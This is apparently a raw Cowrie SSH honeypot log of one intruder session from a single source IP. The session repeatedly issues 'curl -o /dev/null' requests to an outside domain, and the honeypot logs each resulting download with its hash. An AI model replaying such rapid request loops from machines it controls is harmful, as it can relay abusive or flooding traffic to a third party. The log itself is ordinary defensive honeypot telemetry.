{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.114756Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.151827Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.153807Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.157086Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.191679Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.192411Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.198328Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.220315Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.231402Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.232109Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.270537Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.271417Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.308976Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.309706Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.357486Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.358311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.397174Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.397965Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.436642Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.437402Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.474871Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.475601Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.513413Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.514141Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.550826Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.551559Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.596241Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.597008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.635797Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.636574Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.668537Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.674778Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.675468Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.678401Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.714125Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.715000Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.766948Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.767727Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.804684Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.805452Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.844263Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.845114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.882256Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.883040Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.921095Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.921864Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:35.967247Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:35.968008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.000843Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.023474Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.024437Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.051236Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.067546Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.068373Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.099314Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.107139Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.107847Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.139395Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.145026Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.145813Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.194511Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.195444Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.237639Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.238442Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.276367Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.277133Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.315798Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.316556Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.356200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.356953Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.394033Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.394837Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.420162Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.431945Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.435046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.435833Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.459410Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.473394Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.474106Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.517077Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.517861Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.554462Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.555362Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.606119Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.607007Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.639898Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.643921Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.644658Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.677485Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.682857Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.683480Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.688833Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:39:36.721134Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.721934Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.731628Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.file_download","url":"https://ladamoscow.com/","outfile":"var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","shasum":"dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","sensor":"my-vps","timestamp":"2025-08-28T07:39:36.756014Z","message":"Downloaded URL (https://ladamoscow.com/) with SHA-256 dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3 to var/lib/cowrie/downloads/dd5344804fbebbcfe80a8f3688a1ef4fe173923126cd125fe3abb2a00e400bd3","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
